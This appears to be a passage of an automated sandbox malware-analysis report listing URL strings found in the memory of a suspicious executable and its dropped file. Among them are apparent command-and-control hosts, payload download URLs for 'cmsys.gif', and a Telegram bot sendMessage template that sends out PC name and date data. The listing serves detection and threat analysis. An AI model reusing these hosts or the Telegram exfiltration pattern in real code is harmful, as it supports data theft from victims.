Source: svchost.exe, 00000003.00000003.1687408399.0000022D1CC18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000003.00000003.1687408399.0000022D1CC4D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.3.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2949149356.000000000286B000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.0000000003293000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.javedan-battery.com
Source: 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2949149356.000000000286B000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.0000000003293000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.javedan-battery.comd
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1770212402.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2949149356.0000000002761000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 00000039.00000002.1825366595.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1773144054.000000000462D000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1773144054.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1773144054.0000000003D3C000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2949149356.0000000002761000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 00000039.00000002.1828134469.00000000047B6000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 00000039.00000002.1828134469.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2941651605.0000000000434000.00000040.00000400.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: explorer.exe, 00000004.00000003.2047736202.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938459691.00000000007CB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1781831028.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd01.googlecode.com/
Source: explorer.exe, 00000004.00000003.2154831486.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830603055.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830427393.0000000000793000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938534107.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1781831028.000000000079B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048130381.0000000000799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd01.googlecode.com/files/cmsys.gif
Source: explorer.exe, 00000004.00000003.2154831486.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830603055.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830427393.0000000000793000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938534107.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1781831028.000000000079B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048130381.0000000000799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd01.googlecode.com/files/cmsys.gif-)Rq
Source: explorer.exe, 00000004.00000003.2154831486.0000000000799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd01.googlecode.com/files/cmsys.gif1
Source: explorer.exe, 00000004.00000003.2154831486.0000000000799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd01.googlecode.com/files/cmsys.gifG)8q
Source: explorer.exe, 00000004.00000003.1782214985.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1781831028.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd01.t35.com/
Source: explorer.exe, 00000004.00000003.1782214985.00000000007B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd01.t35.com/Z
Source: explorer.exe, 00000004.00000003.1781831028.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd01.t35.com/cmsys.gif
Source: explorer.exe, 00000004.00000003.1781831028.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd01.t35.com/cmsys.gif)
Source: explorer.exe, 00000004.00000003.1781831028.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd01.t35.com/cmsys.gifI
Source: explorer.exe, 00000004.00000003.1781831028.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd01.t35.com/cmsys.gifQ
Source: explorer.exe, 00000004.00000003.1781831028.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd01.t35.com/cmsys.gifS
Source: explorer.exe, 00000004.00000003.1781831028.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd01.t35.com/cmsys.gifll
Source: explorer.exe, 00000004.00000003.1781831028.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd01.t35.com/cmsys.gifr=
Source: explorer.exe, 00000004.00000003.1781831028.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd01.t35.com/cmsys.gifs
Source: explorer.exe, 00000004.00000003.1781831028.000000000079B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd01.t35.com/e.com/files/cmsys.gif
Source: explorer.exe, 00000004.00000003.1782214985.00000000007B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd01.t35.com/~
Source: explorer.exe, 00000004.00000003.1830427393.0000000000775000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd01.zxq.net/cmsys.gifuencaj.exe
Source: explorer.exe, 00000004.00000003.2154831486.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830603055.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830427393.0000000000793000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938534107.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1781831028.000000000079B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048130381.0000000000799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gif
Source: explorer.exe, 00000004.00000003.1781831028.000000000079B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gif(
Source: explorer.exe, 00000004.00000003.1938534107.0000000000799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gif1
Source: explorer.exe, 00000004.00000003.1781831028.000000000079B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gifE
Source: explorer.exe, 00000004.00000003.1938534107.0000000000799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gifG)8q
Source: explorer.exe, 00000004.00000003.2154831486.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830603055.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830427393.0000000000793000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938534107.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1781831028.000000000079B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048130381.0000000000799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gifV()p
Source: explorer.exe, 00000004.00000003.2154831486.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830603055.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830427393.0000000000793000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938534107.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1781831028.000000000079B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048130381.0000000000799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gife(
Source: explorer.exe, 00000004.00000003.2154831486.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830603055.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830427393.0000000000793000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938534107.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1781831028.000000000079B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048130381.0000000000799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gifh(
Source: explorer.exe, 00000004.00000003.2251887908.0000000000799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gifs)
Source: explorer.exe, 00000004.00000003.2154831486.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.0000000000799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gift0)Oq
Source: explorer.exe, 00000004.00000003.1938534107.0000000000799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gifts)
Source: explorer.exe, 00000004.00000003.2048130381.0000000000799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gif
Source: explorer.exe, 00000004.00000003.2251887908.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048130381.0000000000799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gif1
Source: explorer.exe, 00000004.00000003.2154831486.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938534107.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048130381.0000000000799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gif7
Source: explorer.exe, 00000004.00000003.1781831028.000000000079B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gifC(
Source: explorer.exe, 00000004.00000003.1830603055.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830427393.0000000000793000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1781831028.000000000079B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048130381.0000000000799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gifG)8q
Source: explorer.exe, 00000004.00000003.2154831486.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830603055.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830427393.0000000000793000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938534107.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1781831028.000000000079B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048130381.0000000000799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gifJ)5q
Source: explorer.exe, 00000004.00000003.2251887908.0000000000799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gifY)&q
Source: explorer.exe, 00000004.00000003.2154831486.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048130381.0000000000799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gifl)
Source: explorer.exe, 00000004.00000003.2154831486.0000000000799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gifs)
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1776576882.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1776576882.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1776576882.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1776576882.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1776576882.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1776576882.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1776576882.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1776576882.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1776576882.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1776576882.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1776576882.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1776576882.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1776576882.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1776576882.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1776576882.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1776576882.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1776576882.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1776576882.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1776576882.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1776576882.0000000006E12000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1776463249.0000000005CC4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1776576882.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1776576882.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1776576882.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1776576882.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1776576882.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2949149356.0000000002848000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.00000000031F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1773144054.000000000462D000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1773144054.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1773144054.0000000003D3C000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2949149356.0000000002848000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 00000039.00000002.1828134469.00000000047B6000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 00000039.00000002.1828134469.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2941651605.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2949149356.0000000002848000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.00000000031F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2949149356.0000000002848000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.00000000031F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:287400%0D%0ADate%20a
Source: explorer.exe, 00000004.00000003.1938459691.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://api.w.org/
Source: duencaj.exe , 0000003F.00000002.2950015087.00000000032D5000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.00000000032C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2949149356.0000000002925000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.00000000032D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: duencaj.exe , 0000003F.00000002.2950015087.00000000032C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enH
Source: 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2949149356.0000000002920000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.00000000032D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlBfq
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://fonts.googleapis.com/css?family=DM
Source: svchost.exe, 00000003.00000003.1687408399.0000022D1CCC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.3.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.3.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.3.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000003.00000003.1687408399.0000022D1CCC2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: explorer.exe, 00000004.00000003.2154831486.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830603055.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830427393.0000000000793000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938534107.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1781831028.000000000079B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048130381.0000000000799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://news.google.com/publications/CAAqBwgKMJSRswswoazKAw?hl=en-US&gl=US&ceid=US%3Aen
Source: svchost.exe, 00000003.00000003.1687408399.0000022D1CCC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.3.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2949149356.0000000002822000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2949149356.0000000002848000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2949149356.00000000027B3000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.0000000003161000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1773144054.000000000462D000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1773144054.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1773144054.0000000003D3C000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2949149356.00000000027B3000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 00000039.00000002.1828134469.00000000047B6000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 00000039.00000002.1828134469.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.0000000003161000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2941651605.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: duencaj.exe , 0000003F.00000002.2950015087.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2949149356.0000000002822000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2949149356.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2949149356.0000000002848000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.000000000318B000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
